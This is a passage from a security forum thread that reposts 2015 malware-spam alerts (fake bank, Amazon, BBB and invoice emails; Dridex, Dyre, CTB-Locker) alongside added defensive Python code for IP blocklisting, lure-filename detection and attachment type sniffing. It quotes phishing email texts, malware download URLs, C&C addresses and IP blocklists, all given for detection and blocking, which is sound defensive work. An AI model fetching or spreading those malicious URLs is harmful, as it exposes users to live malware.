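    "5.196.143.0/28",
    "5.196.141.24/29",
    "168.235.69.219",
    "168.235.70.106",
]


def compile_blocklist(entries):
    """Parse CIDR ranges and bare addresses into ip_network objects.

    A bare address becomes a single-host network (/32 for IPv4), so every
    entry can be matched with the same containment test below.
    """
    return [ipaddress.ip_network(entry, strict=False) for entry in entries]


def match_blocklist(ip, networks):
    """Return the first blocklist network that contains ip, or None."""
    addr = ipaddress.ip_address(ip)
    for net in networks:
        if addr.version == net.version and addr in net:
            return net
    return None


def triage_connections(observed, entries=DYNAMOO_BLOCKLIST):
    """Map each observed IP to the blocklist entry covering it (as a string), or None.

    Addresses inside a listed range are flagged even when the post did not
    name that exact host (e.g. 5.196.143.9), which is the point of blocking
    the whole /28 rather than the individually named servers.
    """
    networks = compile_blocklist(entries)
    result = {}
    for ip in observed:
        hit = match_blocklist(ip, networks)
        result[ip] = str(hit) if hit is not None else None
    return result


def iptables_rules(entries=DYNAMOO_BLOCKLIST, chain="OUTPUT"):
    """Render the blocklist as iptables DROP rules for outbound traffic."""
    return [f"iptables -A {chain} -d {net} -j DROP" for net in compile_blocklist(entries)]


# Constructed sample of "observed" destinations, as a sandbox report or proxy
# log might list them: two hosts inside the compromised /28 (one of them, .9,
# is not individually named in the post), one host in the /29, one Ramnode
# nameserver, and 192.0.2.10, a documentation address not in the post at all.
SAMPLE_OBSERVED = ["5.196.143.7", "5.196.143.9", "5.196.141.30",
                   "168.235.69.219", "192.0.2.10"]

if __name__ == "__main__":
    for ip, hit in triage_connections(SAMPLE_OBSERVED).items():
        print(f"{ip:16} {'BLOCK (' + hit + ')' if hit else 'no match'}")
    print("\n".join(iptables_rules()))
```

Matching on networks rather than on a set of address strings is what makes the "possibly more" in the post manageable: widening a range is a one-line change and every host inside it is covered without enumerating it.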
AplusWebMaster
2015-02-09, 17:59
FYI...
Fake 'Lloyds new message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/lloyds-new-message-fake-pdf-malware/
9 Feb 2015 - "'You have a new message' pretending to come from Lloyds Commercial Banking <GrpLloydslinkHelpdesk@ lloydsbanking .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Lloyds Commercial Logo
We want you to recognise a fraudulent email if you receive one. Lloyds Bank will always greet you personally using your title and surname and, where you hold an existing account with us, the last four digits of your account number: XXXX1328.
Dear Lloyds Link Customer,
You have a new message
There’s a new message for you, messages contain information about your account, so it’s important to view them.
If you’ve chosen to use a shared email address, please note that anyone who has access to your email account will be able to view your messages.
Please check attached message for more details.
Subject
Date
Account details
Account number
Important information about your account
09 Feb 2015
Lloyds Commercial
XXXX1328
Please note: this message is important and needs your immediate attention. Please check attached file straightaway to view it.
Yours sincerely
Signature image of Nicholas Williams - Consumer Digital Director
Nicholas Williams,
Consumer Digital Director
Please do not reply to this email as this address is not manned and cannot receive any replies.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales, number 2065. Telephone: 020 7626 1500.
Lloyds Bank plc is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority under registration number 119278.
9 February 2015: ImportantMessage.zip: Extracts to: ImportantMessage.scr
Current Virus total detections: 6/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a1baf36ebbc6ba4091f4c44e3b730fc376be6064884e1c50ee9a6e9ab4d6becd/analysis/1423485253/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
77.72.174.165: https://www.virustotal.com/en/ip-address/77.72.174.165/information/
77.72.174.164: https://www.virustotal.com/en/ip-address/77.72.174.164/information/
___
Fake 'Lloyds new debit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-received-new-debit-fake-pdf-malware/
9 Feb 2015 - "'You have received a new debit' pretending to come from Payments Admin <paymentsadmin@ lloydstsb .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Monday 09 February 2014
This is an automatically generated email by the Lloyds TSB PLC
LloydsLink online payments Service to inform you that you have receive a
NEW Payment.
The details of the payment are attached.
This e-mail (including any attachments) is private and confidential and
may contain privileged material. If you have received this e-mail in
error, please notify the sender and delete it (including any
attachments) immediately. You must not copy, distribute, disclose or use
any of the information in it or any attachments.
9 February 2015 : details#00390702.zip: Extracts to: details.exe
Current Virus total detections: 6/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f7412fe1b3fa064fe1897d20be1e39e0a7cba3d25a081f23dd69d03a98dd34ca/analysis/1423485121/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
91.103.216.71: https://www.virustotal.com/en/ip-address/91.103.216.71/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/
:fear: :mad:
AplusWebMaster
2015-02-10, 15:59
FYI...
Fake 'Amazon Order' SPAM – malware
- http://myonlinesecurity.co.uk/amazon-order-details-malware/
10 Feb 2015 - "'Amazon Order Details' pretending to come from Amazon.com <delivers@ amazon .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is a lazy attempt to spread the malware using an old email from last year saying Order R:121216 Placed on June 28, 2014...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Amazon-Order-Details-1024x422.png
Today's Date: order_report.zip: Extracts to: order_report_238974983274928374892374982.exe
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5fc22d2913d37ee645965909c55c33b669a78f86688187b1a20c94f87076b0ef/analysis/1423571463/
___
Fake 'Purchase Order' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-megtrade-groups.html
10 Feb 2015 - "This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@ gmail .com]
Reply-To: venkanch@ gmail .com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd ... Download Attachment As zip
Unusually, this email does -not- appear to be sent out by a botnet but has been sent through -Gmail-. The link in the email goes to www .ebayonline .com .ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named:
(1) Purchase Order Copy.pdf ___________________
(2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf
... or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57*. The Malwr analysis** indicates that this installs a -keylogger- among other things."
* https://www.virustotal.com/en/file/0f24103be25179ed2d97c273ece36744612a81b57833c7d6f79d3b83b88f6761/analysis/1423585487/
** https://malwr.com/analysis/NmFjMWRhZWQyYjVmNDNlNjlmY2ZmMzdkMDRmYTM2NzI/
:fear: :mad:
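The Lloyds ImportantMessage.scr in the previous post and the whitespace-padded "Purchase Order Copy.pdf ... .exe" name in the dynamoo post above are both naming tricks rather than anything clever inside the file. This Python is an added example, not code from either blog or from this forum: it builds a constructed zip whose member names are modelled on those attachments (the dynamoo sample was a .7z, which the standard library cannot open, so zip stands in) and flags executable extensions, runs of padding spaces, and a document extension buried before the real one. The member names and their dummy contents are constructed for the example.

```python
import io
import zipfile

# Extensions Windows will execute directly when double-clicked.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".jar"}
# Extensions the lures pretend to be.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}


def classify_member_name(name):
    """Return the reasons an archive member name looks like a lure (empty list if none)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    # Runs of spaces push the real extension out of view in file dialogs,
    # e.g. "Purchase Order Copy.pdf<many spaces>.exe".
    if "  " in base or base != base.strip():
        reasons.append("whitespace padding in name")
    parts = base.split(".")
    if len(parts) < 2:
        return reasons
    final_ext = "." + parts[-1].strip()
    if final_ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {final_ext}")
        # A document extension hidden before the real one ("invoice.pdf.exe").
        for middle in parts[1:-1]:
            hidden = "." + middle.strip()
            if hidden in DOCUMENT_EXTS:
                reasons.append(f"document extension {hidden} before {final_ext}")
                break
    return reasons


def scan_zip_bytes(data):
    """Scan every file member of an in-memory zip; return {name: [reasons]} for hits only."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_member_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings


# Constructed name in the style of the dynamoo sample: 40 spaces between .pdf and .exe.
PADDED_NAME = "Purchase Order Copy.pdf" + " " * 40 + ".exe"


def build_sample_zip():
    """Constructed zip mirroring the attachment names quoted in the posts; contents are dummies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ImportantMessage.scr", b"MZ\x90\x00 dummy")
        zf.writestr("order_report_238974983274928374892374982.exe", b"MZ\x90\x00 dummy")
        zf.writestr(PADDED_NAME, b"MZ\x90\x00 dummy")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_zip_bytes(build_sample_zip()).items():
        print(repr(name), "->", "; ".join(reasons))
```

The check runs on names only, so it is cheap enough to apply at the mail gateway before any extraction; .scr is included deliberately because, as the Lloyds post shows, it runs exactly like .exe while looking less alarming.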
AplusWebMaster
2015-02-11, 15:23
FYI...
Fake 'e-invoice' SPAM
- http://blog.dynamoo.com/2015/02/malware-spam-your-latest-e-invoice-from.html
11 Feb 2015 - "This -fake- invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case... The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216 "
1] https://www.virustotal.com/en/file/049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598/analysis/1423650591/
2] https://www.virustotal.com/en/file/60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976/analysis/1423650604/
3] https://www.virustotal.com/en/file/fdb34b9f8e3d6ee1098db6dfc800ff6a221ec10896536ad3ec3b4d31da77dc65/analysis/1423650615/
- http://myonlinesecurity.co.uk/latest-e-invoice-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-latest-e-invoice-from-FINNAUST-MINING-PLC.png
___
Fake 'Outstanding Invoice' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-gail-walker.html
11 Feb 2015 - "This fake invoice does -NOT- come from MBL Seminars, they are -not- sending this spam nor have their systems been compromised. Instead, this is a -forgery- with a malicious attachment.
From: Gail Walker [gail@ mblseminars .com]
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited ...
So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each... This file is saved as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57*... It also drops a DLL with a detection rate of 3/57** which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70 "
1] https://www.virustotal.com/en/file/30b22b141dcab6cc981008ddb04d95f90fa87ce2aeb41affd27bd5a704f62fd4/analysis/1423653571/
2] https://www.virustotal.com/en/file/83223934492586e28666cdb2ee4bf2bb3e78ead6d78d691274a5fe27a7fbb9a3/analysis/1423653583/
* https://www.virustotal.com/en/file/9e873d66a8663fcbccc0a959adbbc924e3cbc4cd04746411d3ffbd7d5337220e/analysis/1423653592/
** https://www.virustotal.com/en/file/10bf548e73dffefc5f4da1fa6d3d61922fec614726f18a22f49be0e8f9f7901e/analysis/1423654973/
- http://myonlinesecurity.co.uk/gail-walker-mbl-seminars-limited-outstanding-invoice-271741-word-doc-malware/
11 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Outstanding-Invoice-271741.png
:fear: :mad:
AplusWebMaster
2015-02-12, 15:38
FYI...
Fake BBB SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-bbb-accreditation-services.html
12 Feb 2015 - "This -fake- BBB email has a malicious attachment.
From: BBB Accreditation Services [no-replay@ newyork .bbb .org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57*. Automated analysis tools... show that it attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
time.microsoft.akadns .net
checkip.dyndns .org
Of these, checkip.dyndns .org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun .com on 95.173.170.227*** (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http ://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http ://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http ://semiyun .com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be -blocked-. A file jeoQxZ5.exe is also dropped with a detection rate of 6/57**. This is most likely the Dyre banking trojan..."
* https://www.virustotal.com/en/file/262d1398851f1f43f4382812e744b3cbc484ae9f4605e03f65c3977919e32a6c/analysis/1423739716/
** https://www.virustotal.com/en/file/1d90a17f9f4a8d0a17c46a82f4e48b8a645ddde67c59cfe89becd34b20a4bd25/analysis/1423741855/
*** 95.173.170.227: https://www.virustotal.com/en/ip-address/95.173.170.227/information/
___
Fake 'invoice :reminder' SPAM - leads to CVE-2012-0158 exploit
- http://blog.dynamoo.com/2015/02/invoice-reminder-spam-leads-to-cve-2012.html
12 Feb 2015 - "This spam has a malicious attachment:
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@ valueline .in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that it is malicious, with a detection rate of 6/57*. Those detections indicate that this is exploiting CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble. The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex .net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57** and the Malwr report for this indicates that among other things it installs a -keylogger- confirmed by the ThreatExpert report.
The domain directxex .net [Google Safebrowsing***] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you -block- traffic to directxex .net."
* https://www.virustotal.com/en/file/a3a794d582a3f006981ed7c02ec540cf4b21e53bf2d7cb9fb8154a78da4b7228/analysis/1423764503/
** https://www.virustotal.com/en/file/754044eb9a2a2cc5bfbb1e955a9ef7e94c694cfde4ab59ea8e55ea68d106affb/analysis/1423765263/
*** https://www.google.com/safebrowsing/diagnostic?site=directxex.net
"... listed for suspicious activity 122 time(s) over the past 90 days..."
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
___
Fake 'INVOICE' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-minuteman-press-west-loop.html
12 Feb 2015 - "This -fake- invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email -forgery-.
From: Minuteman Press West Loop [westloop@ minutemanpress .com]
Reply-To: westloop@ minutemanpress .com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57* and contains this malicious macro which downloads a second component from:
http ://ecinteriordesign .com/js/bin.exe
This is then saved as %TEMP%\IHJfffFF.exe and has a detection rate of 7/57**. Automated analysis tools... show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago***."
* https://www.virustotal.com/en/file/01cb3eedc33553959d548134caf0552662bbb3cdb3cc4c94dd037a6f9aa577a4/analysis/1423734590/
** https://www.virustotal.com/en/file/a42dc7abd83b0e329b846ea280c02812454acb5b98902adda8cfc786866fac5d/analysis/1423734603/
*** https://www.virustotal.com/en/file/50f6ae0daf2b2e5b2a4822d859fd3d503d9efa29871ecb286480fc8c4ffdd7c7/analysis/
___
CTB-Locker Ransomware Spoofs Chrome and Facebook Emails as Lures, Linked to Phishing
- http://blog.trendmicro.com/trendlabs-security-intelligence/ctb-locker-ransomware-spoofs-chrome-and-facebook-emails-as-lures-linked-to-phishing/
Feb 12, 2015 - "... We are seeing another wave of CTB-Locker -ransomware- making their way into the wild. What’s highly notable about this current batch of crypto-ransomware is that they are using “big names” like Facebook and Google Chrome as social engineering lures.
The New Lures: We observed that the CTB-Locker ransomware arrives through spammed emails pretending to be from Google Chrome and Facebook. The -fake- Google Chrome email pretends to be a notification about updating the recipient’s Chrome browser. Upon clicking-the-link, the user will be directed to a site hosting the malware. The malware uses a Google Chrome -icon- to disguise itself as a legitimate installer package. This is actually a variant detected as TROJ_CRYPCTB.YUX.
Fake Google Chrome email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-1.png
Another lure used by cybercriminals is Facebook. The email arrives as an account suspension notification. The email instructs the user to click on an embedded link. This link will lead to the download of the malware:
Fake Facebook email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-2.png
The malware uses a .PDF icon to disguise itself as a legitimate file. This malware is detected as TROJ_CRYPCTB.NSA. Our findings show that -both- variants are hosted in -compromised- sites. And interestingly enough, each variant is hosted on a group of compromised sites that is linked to one IP address. Connections to Phishing: Digging deeper into these compromised sites, we discovered that some of these URLs are associated with phishing spam, specifically those using -PayPal- as their lure.
Fake PayPal email:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-3.png
The spammed email arrives with the subject, “Take Action PayPal.” The email instructs the recipient to log in to their PayPal account to settle an issue by clicking-a-link in the email. Upon clicking, the link redirects to a phishing site. The site asks not only for the user’s login credentials, but other important, sensitive information like contact details and credit card information.
Fake PayPal site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-4.png
Information requested by the phishing site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-5.png
Once the user completes all the information, the site then redirects the person to the legitimate PayPal login page. To avoid suspicion, it uses the excuse of needing to log in -again- for the changes to fully reflect in the PayPal account. Using the same URLs as those of the CTB-Locker malware suggests that the threat actors distributing the ransomware are also dabbling in phishing... CTB-Locker variants included language support for four languages: English, German, Italian, and Dutch. This new batch of ransomware now supports seven languages, namely, French, Spanish, Latvian, German, Dutch, Italian, and English.
Ransom message:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-6.png
... The malware also now arrives in a Windows installer package. The two new variants identified were wrapped in an installer using NSIS. Cybercriminals leverage NSIS, which is an open source installer like InstallShield, to make analysis difficult. When executed, the malware drops an encrypted version of the CRYPCTB malware and a library (.DLL) file. The library file will decrypt and execute the ransomware. After the routine, the library file will delete itself. In a surprising move, the cybercriminals adjusted the ransom payment for the decryption of files to 2 BTC, a fee lower than the 3 BTC ransom fee of previous variants. The malware also uses a new set of Tor Addresses to communicate with the affected system... the added languages are all for countries based in Europe. This suggests that these variants may be targeting the EMEA region...
Top countries affected by CRYPCTB malware family:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/02/CTB-L-72.jpg
... Conclusion: From what we’ve seen, the threat actors focused more on improving their chances of spreading the malware than improving the design of the code itself. Once the malware is in the system, it can be very challenging to recover the files without getting their help. As we have mentioned in previous entries, it might be tempting to give in and pay the ransom fee to get back encrypted files. However, there is no guarantee that the cybercriminals will actually honor the exchange. At the very worst, the victim is left with no files and no money..."
:fear: :mad:
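Several of the posts above turn on what an attachment actually is rather than what its name says: INVOICE.doc that is really an RTF carrying the CVE-2012-0158 exploit, .exe files wearing a PDF icon, and OLE .doc files that carry a macro downloader. This Python is an added example, not code from dynamoo, Trend Micro or any of the quoted blogs: it classifies an attachment by its leading bytes, compares that with the extension, and applies a string heuristic for a VBA project stream inside an OLE file. The sample blobs are constructed stand-ins (a few header bytes plus filler), and the VBA check is a hint only, not an OLE parser.

```python
import os


def sniff_type(data):
    """Classify a blob by its magic bytes, ignoring whatever extension it carries."""
    if data.startswith(b"MZ"):
        return "pe"      # Windows executable: .exe, .scr, .dll
    if data.startswith(b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"):
        return "ole"     # OLE2 compound file: legacy .doc/.xls, the carrier for VBA macros
    if data.startswith(b"PK\x03\x04"):
        return "zip"     # zip container, which includes OOXML .docx/.xlsx
    if data.startswith(b"{\\rtf"):
        return "rtf"     # Rich Text, the real format of the "INVOICE.doc" in the CVE-2012-0158 post
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "unknown"


# Sniffed types that are legitimate for a given extension.
EXPECTED = {
    ".exe": {"pe"}, ".scr": {"pe"}, ".dll": {"pe"},
    ".doc": {"ole"}, ".xls": {"ole"},
    ".docx": {"zip"}, ".xlsx": {"zip"},
    ".rtf": {"rtf"},
    ".pdf": {"pdf"},
}


def check_attachment(filename, data):
    """Return (sniffed_type, verdict) for one attachment."""
    ext = os.path.splitext(filename)[1].lower()
    kind = sniff_type(data)
    if kind == "pe":
        # A spoofed icon does not change the header: anything starting with MZ runs as code.
        return kind, "executable attachment"
    if kind == "unknown":
        return kind, "unrecognised content"
    if kind in EXPECTED.get(ext, set()):
        return kind, "ok"
    return kind, f"content is {kind} but extension claims {ext}"


# OLE directory entries store stream names as UTF-16LE, so a macro-carrying .doc
# normally contains the name _VBA_PROJECT; decompressed module source carries
# "Attribute VB_". Heuristic only; use a real parser (e.g. oletools) to confirm.
VBA_MARKERS = ("_VBA_PROJECT".encode("utf-16-le"), b"Attribute VB_")


def has_vba_hint(data):
    """True if any VBA marker string appears anywhere in the blob."""
    return any(marker in data for marker in VBA_MARKERS)


OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"

# Constructed stand-ins modelled on the attachments discussed above.
SAMPLES = {
    # RTF exploit document renamed to .doc, as in the "invoice :reminder" post
    "INVOICE.doc": b"{\\rtf1\\ansi\\deff0 constructed sample }",
    # PE with a PDF icon, as in the CashPro "docs.exe" and BBB "SQB Form.exe" posts
    "docs.exe": b"MZ\x90\x00\x03\x00 constructed sample",
    # OLE .doc whose directory names a VBA project, as in the macro invoice posts
    "2600_001.doc": OLE_MAGIC + b"\x00" * 16 + "_VBA_PROJECT".encode("utf-16-le") + b"\x00" * 8,
    # A benign PDF for comparison
    "report.pdf": b"%PDF-1.4\n constructed sample",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        kind, verdict = check_attachment(name, blob)
        macro = " (VBA hint)" if kind == "ole" and has_vba_hint(blob) else ""
        print(f"{name:14} {kind:8} {verdict}{macro}")
```

The RTF-as-.doc mismatch is the one worth alerting on outright: Word opens an RTF regardless of the extension, so the rename exists only to get past people and filters that trust the suffix.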
AplusWebMaster
2015-02-13, 17:49
FYI...
Fake 'Remittance' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-remittance-xx12345678.html
13 Feb 2015 - "This -spam- comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
From: Gale Barlow
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
There is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57* and it contains a malicious macro which downloads a file from the following location:
http ://62.76.188.221 /aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57**, identified as a Dridex downloader. Automated analysis tools... show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52*** and mysteriously drops another Dridex downloader with a detection rate of 6/57****. The Malwr report for that indicates there is some attempted traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159 "
* https://www.virustotal.com/en/file/84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a/analysis/1423835743/
